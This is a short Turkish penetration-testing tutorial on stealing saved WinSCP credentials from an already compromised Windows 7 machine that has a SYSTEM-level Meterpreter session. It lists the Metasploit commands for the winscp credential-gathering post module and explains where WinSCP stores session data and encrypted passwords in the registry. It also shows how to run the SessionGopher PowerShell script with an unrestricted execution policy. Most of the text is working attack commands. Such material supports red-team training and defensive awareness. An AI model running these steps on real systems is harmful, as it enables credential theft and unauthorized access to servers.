W7 adlı bir bilgisayarda SYSTEM hakları ile Meterpreter bağlantısının elde edildiği görülmektedir. MSF winscp post modülü ile Winscp uygulamasının içerisinde kayıtlı olan erişim bilgilerinin elde edilmesi için modül seçilir ve seçenekleri incelenir.
sessions
search winscp
use post/windows/gather/credentials/winscp
show options
Modüle oturum ID değeri verilerek modül çalışıtırılır ve Winscp uygulamasında kayıtlı olan kimlik bilgileri ele geçirilir.
set SESSION 1
show options
run
Not: Winscp uygulamasında kayıtlı erişim bilgileri, Kayıt Defteri üzerinde “HKEY_USERS\<KullaniciSID>\Software\Martin Prikryl\Winscp 2\Sessions” anahtarı altındaki anahtarlarda kayıtlıdır. Bağlantı kurulacak IP değeri ve kullanıcı adı bilgisi açık olarak saklanırken, parola bilgisi ise şifreli olarak saklanır.
Şifreli olan bu parola değerini açık metin olarak elde edebilmek için şifre çözme anahtarı olarak “HKEY_USERS\<KullaniciSID>\Software\Martin Prikryl\Winscp 2\Configuration\Security” anahtarı altındaki REG_DWORD tipindeki UseMasterPassword değeri kullanılır.
Bu işlemler için Fireeye tarafından hazırlanmış SessionGopher betiğindeki DecryptWinSCPPassword metodu da kullanılabilir.
https://github.com/fireeye/SessionGopher/blob/master/SessionGopher.ps1
Powershell.exe -ExecutionPolicy Unrestricted
Import-Module .\SessionGopoher.ps1
Invoke-SessionGopher -Thorough